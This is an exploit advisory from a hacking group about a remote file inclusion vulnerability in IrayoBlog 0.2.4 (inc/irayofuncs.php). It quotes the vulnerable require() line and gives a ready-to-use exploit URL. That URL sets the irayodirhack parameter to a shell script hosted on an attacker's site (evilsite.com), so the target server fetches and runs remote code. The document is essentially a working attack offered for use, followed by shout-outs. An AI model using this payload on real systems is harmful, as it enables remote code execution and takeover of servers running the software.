IrayoBlog version 0.2.4 suffers from a remote file inclusion vulnerability in inc/irayofuncs.php.
97e4f254211ea71204fc581a0a5dd769b566237f07f9b45ed210a077407bbcf2
*********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************
* Portal Name :irayoblog-alpha-0.2.4
* Class = Remote File Inclusion ;
* Download =https://ovh.dl.sourceforge.net/sourceforge/irayoblog/irayoblog-alpha-0.2.4.tar.gz
* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)
----------------------------------------------------------------------------------------------------------
- Vulnerable Code
require($irayodirhack."/inc/configdefaults.php");
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
https://[target]/[path]/inc/irayofuncs.php?irayodirhack=https://evilsite.com/shell?
----------------------------------------------------------------------------------------------------------
Special Thanks : Dr.Trojan , Hiv++ , D_7j , Lord
Special Thanks To Best My Friend : Tanha
**********************************************************************************************************